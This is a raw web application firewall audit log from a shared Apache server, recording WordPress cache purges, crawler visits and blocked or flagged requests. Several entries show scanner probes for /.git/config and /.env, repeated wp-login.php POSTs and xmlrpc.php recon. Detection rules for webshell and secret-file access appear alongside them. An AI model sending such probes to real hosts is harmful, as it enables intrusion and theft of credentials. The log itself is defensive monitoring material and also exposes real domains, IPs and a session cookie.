Server: Apache Engine-Mode: "ENABLED" --05a19955-Z-- --23917169-A-- [30/Jun/2025:21:17:39.270135 +0530] aGKxl3VjGudlwpQFhGN6sQAAADo 103.185.74.40 31072 192.168.74.40 443 --23917169-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --23917169-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --23917169-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298455668486 3602407 (- - -) Stopwatch2: 1751298455668486 3602407; combined=2623, p1=90, p2=2284, p3=0, p4=0, p5=249, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --23917169-Z-- --bbfbb96d-A-- [30/Jun/2025:21:17:39.287042 +0530] aGKxmt-UElwS6fqSGu4_RgAAAEg 188.166.88.13 52230 192.168.74.40 443 --bbfbb96d-B-- POST //wp-login.php HTTP/1.1 Host: raghuveergears.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298459310779 186581 (- - -) Stopwatch2: 1751298459310779 186581; combined=9779, p1=132, p2=9113, p3=244, p4=6, p5=283, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --52923f59-Z-- --256e9927-A-- [30/Jun/2025:21:17:39.554365 +0530] aGKxl1i_NV0xgInTbBWlZAAAAD0 103.185.74.40 9726 192.168.74.40 443 --256e9927-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --256e9927-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --256e9927-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298455812215 3743056 (- - -) Stopwatch2: 1751298455812215 3743056; combined=6987, p1=140, p2=6616, p3=0, p4=0, p5=231, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --256e9927-Z-- --762beb00-A-- [30/Jun/2025:21:17:39.558390 +0530] aGKxm-LmhZtgtWVUq4HvmwAAAHM 188.166.88.13 61814 192.168.74.40 80 --762beb00-B-- POST /wp-login.php HTTP/1.1 Host: novemsol.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=ff9831fa6600d5e731e02b11ce611bff; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298458475669 3652066 (- - -) Stopwatch2: 1751298458475669 3652066; combined=9585, p1=175, p2=8666, p3=317, p4=7, p5=420, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b83a1f55-Z-- --d8108c05-A-- [30/Jun/2025:21:17:42.185297 +0530] aGKxm_Y1ABNXoIM8gyn3uwAAAAE 103.185.74.40 43394 192.168.74.40 443 --d8108c05-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --d8108c05-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d8108c05-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298459768732 2417507 (- - -) Stopwatch2: 1751298459768732 2417507; combined=3362, p1=123, p2=3068, p3=0, p4=0, p5=170, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d8108c05-Z-- --54d7b652-A-- [30/Jun/2025:21:17:42.200026 +0530] aGKxnaO12cK_VlXWiTB6NwAAAFY 188.166.88.13 52594 192.168.74.40 443 --54d7b652-B-- POST //wp-login.php HTTP/1.1 Host: rmhil.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 76 Accept-Language: en-US,en;q=0.5 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d48de818-Z-- --12e24205-A-- [30/Jun/2025:21:42:21.788815 +0530] aGK3ZUBlsNMqyv0UMUIevQAAABw 167.99.81.70 55386 192.168.74.40 80 --12e24205-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --12e24205-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --12e24205-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751299941782717 6363 (- - -) Stopwatch2: 1751299941782717 6363; combined=3761, p1=73, p2=3583, p3=0, p4=0, p5=104, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --12e24205-Z-- --14eca95d-A-- [30/Jun/2025:21:42:21.817184 +0530] aGK3ZU3YNcohOUjGYGT9-wAAAAw 13.74.181.243 8197 192.168.74.40 80 --14eca95d-B-- GET /xmlrpc.php HTTP/1.1 Host: cvea.co.in --14eca95d-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --14eca95d-H-- Message: String match "xmlrpc.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "166"] [id "77141064"] [msg "IM360 WAF: CMS Recon Bot detected||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/xmlrpc.php||RM:GET||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php72___lsphp Stopwatch: 1751299941812275 4981 (- - -) Stopwatch2: 1751299941812275 4981; combined=2976, p1=80, p2=2729, p3=70, p4=1, p5=96, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --14eca95d-Z-- --8752fe6c-A-- [30/Jun/2025:21:42:22.095282 +0530] aGK3ZrTriGQPsVfE9hfLrgAAADY 167.99.81.70 55388 192.168.74.40 80 --8752fe6c-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --8752fe6c-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --8752fe6c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751299942091467 4077 (- - -) Stopwatch2: 1751299942091467 4077; combined=1150, p1=96, p2=601, p3=0, p4=0, p5=452, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8752fe6c-Z-- --9ac6704f-A-- [30/Jun/2025:21:42:22.312052 +0530] aGK3Zs_JQV6SIFvW0vdAUAAAADI 20.171.207.232 51040 192.168.74.40 443 --9ac6704f-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --9ac6704f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9ac6704f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/js/hotels-jodhpur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751299942297111 15767 (- - -) Stopwatch2: 1751299942297111 15767; combined=3538, p1=144, p2=3234, p3=0, p4=0, p5=159, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751300950973923 1949511 (- - -) Stopwatch2: 1751300950973923 1949511; combined=7678, p1=321, p2=6690, p3=251, p4=84, p5=332, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --17111a6e-Z-- --66dc6955-A-- [30/Jun/2025:21:59:17.345917 +0530] aGK7Xd-OASVgjzTipBewawAAACg 103.185.74.40 17431 192.168.74.40 443 --66dc6955-B-- POST /wp-cron.php?doing_wp_cron=1751300957.1114699840545654296875 HTTP/1.1 Host: sheikhamurad.adillusion.com User-Agent: WordPress/6.7.2; https://sheikhamurad.adillusion.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --66dc6955-C-- --66dc6955-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --66dc6955-H-- Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751300957.1114699840545654296875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751300957324936 21202 (- - -) Stopwatch2: 1751300957324936 21202; combined=9110, p1=120, p2=7911, p3=307, p4=7, p5=765, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --66dc6955-Z-- --0bdde304-A-- [30/Jun/2025:21:59:22.858606 +0530] aGK7YpABMTJx07gDqJr84wAAACE 65.109.239.39 52764 192.168.74.40 443 --0bdde304-B-- GET /xmlrpc.php HTTP/1.1 Host: n-pillarsconstruction.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, zstd, br Accept-Language: nl-NL,nl;q=0.9 Content-Type: application/xml Referer: http://n-pillarsconstruction.com --0bdde304-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --0bdde304-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b811040a-Z-- --f2484374-A-- [30/Jun/2025:22:08:50.789262 +0530] aGK9mr7AbQDDayuc_pwgbAAAACA 43.153.10.83 53248 192.168.74.40 80 --f2484374-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f2484374-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --f2484374-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751301530782157 7547 (- - -) Stopwatch2: 1751301530782157 7547; combined=4424, p1=114, p2=4059, p3=85, p4=3, p5=163, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2484374-Z-- --a6c0ac61-A-- [30/Jun/2025:22:08:51.097797 +0530] aGK9mOW3kuGijC1XetibfgAAAAU 49.51.72.76 55958 192.168.74.40 443 --a6c0ac61-B-- GET /wp-json/wp/v2/pages/404 HTTP/1.1 Host: sriselvalakshmihomecare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --a6c0ac61-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 X-Robots-Tag: noindex X-Content-Type-Options: nosniff -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301928023306 14116 (- - -) Stopwatch2: 1751301928023306 14116; combined=2849, p1=121, p2=2572, p3=0, p4=0, p5=155, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d0c3cb78-Z-- --90ecdf5a-A-- [30/Jun/2025:22:15:29.057351 +0530] aGK_KShW0y6BtZ8smLhvhQAAAAY 103.185.74.40 16327 192.168.74.40 443 --90ecdf5a-B-- POST /wp-cron.php?doing_wp_cron=1751301928.7696580886840820312500 HTTP/1.1 Host: vcharity.in User-Agent: WordPress/6.8.1; https://vcharity.in Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --90ecdf5a-C-- --90ecdf5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --90ecdf5a-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751301928.7696580886840820312500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301929039120 18621 (- - -) Stopwatch2: 1751301929039120 18621; combined=6451, p1=111, p2=5704, p3=214, p4=4, p5=418, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --90ecdf5a-Z-- --afd4df26-A-- [30/Jun/2025:22:15:29.223093 +0530] aGK_KSkSecaCzZdwhdiFSwAAABw 20.171.207.232 44998 192.168.74.40 443 --afd4df26-B-- GET /https/aainag/images/testimonials/Rajasthan-Travel-Guides/aainag/Rajasthan-Travel-Guides/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --afd4df26-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --afd4df26-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301937328493 16119 (- - -) Stopwatch2: 1751301937328493 16119; combined=3325, p1=149, p2=3017, p3=0, p4=0, p5=159, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ed582a04-Z-- --04b0f55e-A-- [30/Jun/2025:22:15:37.735188 +0530] aGK_MJ9z-4ap8ia7NQfwhQAAAAk 103.185.74.40 19130 192.168.74.40 443 --04b0f55e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04b0f55e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04b0f55e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301936440496 1295167 (- - -) Stopwatch2: 1751301936440496 1295167; combined=2521, p1=87, p2=2263, p3=0, p4=0, p5=171, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04b0f55e-Z-- --a9903315-A-- [30/Jun/2025:22:15:38.480147 +0530] aGK_MikSecaCzZdwhdiFUwAAABw 20.171.207.232 44998 192.168.74.40 443 --a9903315-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/aaina/1/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a9903315-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a9903315-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301938461940 18325 (- - -) Stopwatch2: 1751301938461940 18325; combined=3669, p1=182, p2=3323, p3=0, p4=0, p5=164, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a9903315-Z-- --57aaac11-A-- [30/Jun/2025:22:15:39.140154 +0530] aGK_MZnOaVsQbbgcPUCHzwAAACo 103.185.74.40 62224 192.168.74.40 443 --57aaac11-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --57aaac11-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --57aaac11-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301937947550 1192931 (- - -) Stopwatch2: 1751301937947550 1192931; combined=2021, p1=74, p2=1803, p3=0, p4=0, p5=144, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --57aaac11-Z-- --a289386b-A-- [30/Jun/2025:22:15:40.875854 +0530] aGK_NCkSecaCzZdwhdiFVQAAABw 20.171.207.232 44998 192.168.74.40 443 --a289386b-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/Rajasthan-Travel-Guides/js/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a289386b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a289386b-H-- -- Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:404||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] 